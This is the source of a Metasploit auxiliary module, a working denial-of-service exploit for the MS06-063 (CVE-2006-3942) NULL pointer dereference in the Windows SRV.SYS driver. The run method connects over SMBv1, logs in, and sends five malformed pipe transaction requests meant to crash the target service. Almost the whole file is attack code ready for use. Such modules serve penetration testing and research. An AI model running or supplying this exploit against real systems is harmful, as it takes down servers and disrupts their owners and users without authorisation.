1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::SMB::Client
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
15
        'Description' => %q{
16
          This module exploits a NULL pointer dereference flaw in the
17
          SRV.SYS driver of the Windows operating system. This bug was
18
          independently discovered by CORE Security and ISS.
19
        },
20

21
        'Author' => [ 'hdm' ],
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          ['OSVDB', '27644' ],
25
          ['MSB', 'MS06-063' ],
26
          ['CVE', '2006-3942'],
27
          ['BID', '19215'],
28
        ],
29
        'Notes' => {
30
          'Stability' => [CRASH_SERVICE_DOWN],
31
          'SideEffects' => [],
32
          'Reliability' => []
33
        }
34
      )
35
    )
36

37
    deregister_options('SMB::ProtocolVersion')
38
  end
39

40
  def run
41
    print_status('Connecting to the target system...')
42

43
    connect(versions: [1])
44
    smb_login
45

46
    begin
47
      1.upto(5) do |i|
48
        print_status("Sending bad SMB transaction request #{i}...")
49
        simple.client.trans_nonull(
50
          "\\#{Rex::Text.rand_text_alphanumeric(1..16)}",
51
          '',
52
          Rex::Text.rand_text_alphanumeric(1..16),
53
          3,
54
          [1, 0, 1].pack('vvv'),
55
          true
56
        )
57
      end
58
    rescue ::Interrupt
59
      return
60
    rescue StandardError => e
61
      print_error("Error: #{e.class} > #{e}")
62
    end
63

64
    disconnect
65
  end
66
end
67

68